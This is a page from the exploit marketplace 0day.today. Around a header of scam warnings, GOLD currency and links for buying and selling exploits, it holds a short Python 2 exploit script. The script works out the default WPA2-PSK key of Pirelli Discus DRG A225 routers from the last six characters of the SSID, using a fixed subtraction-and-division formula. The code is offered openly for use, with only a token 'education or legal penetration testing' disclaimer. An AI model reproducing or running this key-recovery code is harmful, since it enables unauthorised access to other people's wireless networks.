0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Pirelli Discus DRG A225 wifi router WPA2PSK Default Algorithm Exploit
===================================================================== Pirelli Discus DRG A225 wifi router WPA2PSK Default Algorithm Exploit ===================================================================== #!/usr/bin/python # # Pirelli Discus DRG A225 WiFi router # Default WPA2-PSK algorithm vulnerability # # paper: http://milw0rm.com/papers/313 # # With this code we can predict the WPA2-PSK key... # # Hacked up by Muris Kurgas aka j0rgan # j0rgan (-@-) remote-exploit.org # http://www.remote-exploit.org # # Use for education or legal penetration testing purposes..... # import sys def hex2dec(s): return int(s, 16) if len(sys.argv) < 2 or len(sys.argv[1]) != 6: print "\r\nEnter the last 6 chars from Discus SSID" print "i.e. SSID should be 'Discus--XXXXXX', where XXXXXX is last 6 chars\r\n" exit() const = hex2dec('D0EC31') inp = hex2dec(sys.argv[1]) result = (inp - const)/4 print "Possible PSK for Discus--"+sys.argv[1]+" would be: YW0"+str(result) # 0day.today [2024-12-24] #